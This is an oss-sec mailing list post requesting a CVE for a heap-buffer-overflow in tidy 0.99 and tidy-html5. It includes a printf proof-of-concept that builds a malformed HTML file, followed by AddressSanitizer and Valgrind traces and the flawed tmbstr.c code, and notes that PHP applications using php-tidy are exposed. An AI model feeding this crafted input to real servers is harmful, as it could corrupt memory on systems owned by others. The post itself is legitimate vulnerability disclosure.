oss-sec mailing list archives
Re: CVE Request - tidy 0.99 / tidy5 heap-buffer-overflow
From: Fernando Muñoz <fernando () null-life com>
Date: Tue, 16 Jun 2015 23:14:48 -0500
Any update about a CVE ID for this issue? I forgot to mention, this could be also abused on PHP based applications that use php-tidy extension with user supplied data. On Thu, Jun 4, 2015 at 12:50 AM, Fernando Muñoz <fernando () null-life com> wrote:
Hello , I'd like to request a CVE ID for the following issue: tidy [1] is affected by a write out of bounds when processing malformed html files. This issue could be abused on server side applications that use php-tidy extension with user input. The issue was confirmed, analysed and fixed by the tidy5 maintainer. [2] POC $ printf "\x3c\x61\x20\x62\x3d\x3c\x61\x20\x3c\x3f\x78\x6d \x0d\x3f\x3e\x62\x3d\x22\x63\x22\x47\x20\x68\x72\x65 \x66\x3d\x22\x12\x22\xbb" > err.html An asan-enabled build of tidy outputs: $ tidy-asan err.html ==================================================== ==2196==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb53006b1 at pc 0xb71df8fe bp 0xbfac9928 sp 0xbfac9918 WRITE of size 1 at 0xb53006b1 thread T0 #0 0xb71df8fd in prvTidytmbstrndup (/usr/lib/libtidy-0.99.so.0+0x15c8fd) #1 0xb7141060 in prvTidyGetToken (/usr/lib/libtidy-0.99.so.0+0xbe060) #2 0xb711856e in prvTidyParseDocument (/usr/lib/libtidy-0.99.so.0+0x9556e) #3 0xb71f2a58 in prvTidyDocParseStream (/usr/lib/libtidy-0.99.so.0+0x16fa58) #4 0xb71f34a5 in tidyParseFile (/usr/lib/libtidy-0.99.so.0+0x1704a5) #5 0x804bfa9 (/usr/bin/tidy+0x804bfa9) #6 0xb6edf72d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d) #7 0x804fa4e (/usr/bin/tidy+0x804fa4e) 0xb53006b1 is located 0 bytes to the right of 1-byte region [0xb53006b0,0xb53006b1) allocated by thread T0 here: #0 0xb72af18c in __interceptor_malloc (/usr/lib/i386-linux-gnu/libasan.so.1+0x5118c) #1 0xb71c5963 (/usr/lib/libtidy-0.99.so.0+0x142963) ... Valgrind with the standard build: $ valgrind tidy err.html ... ==30499== Invalid write of size 1 ==30499== at 0x408805C: prvTidytmbstrndup (tmbstr.c:39) ==30499== by 0x40738A8: ParseValue (lexer.c:3486) ... ==30499== Invalid write of size 1 ==30499== at 0x4088065: prvTidytmbstrndup (tmbstr.c:41) ==30499== by 0x40738A8: ParseValue (lexer.c:3486) ==30499== by 0x4075F39: ParseAttrs (lexer.c:3603) ==30499== by 0x4075F39: GetTokenFromStream (lexer.c:2416) ... file: tmbstr.c 39 while ( len-- > 0 && (*cp++ = *str++) ) 40 /**/; 41 *cp = 0; Credit: Fernando Muñoz [1] tidy.sourceforge.net [2] https://github.com/htacg/tidy-html5/issues/217
Current thread:
- CVE Request - tidy 0.99 / tidy5 heap-buffer-overflow Fernando Muñoz (Jun 03)
- Re: CVE Request - tidy 0.99 / tidy5 heap-buffer-overflow Fernando Muñoz (Jun 16)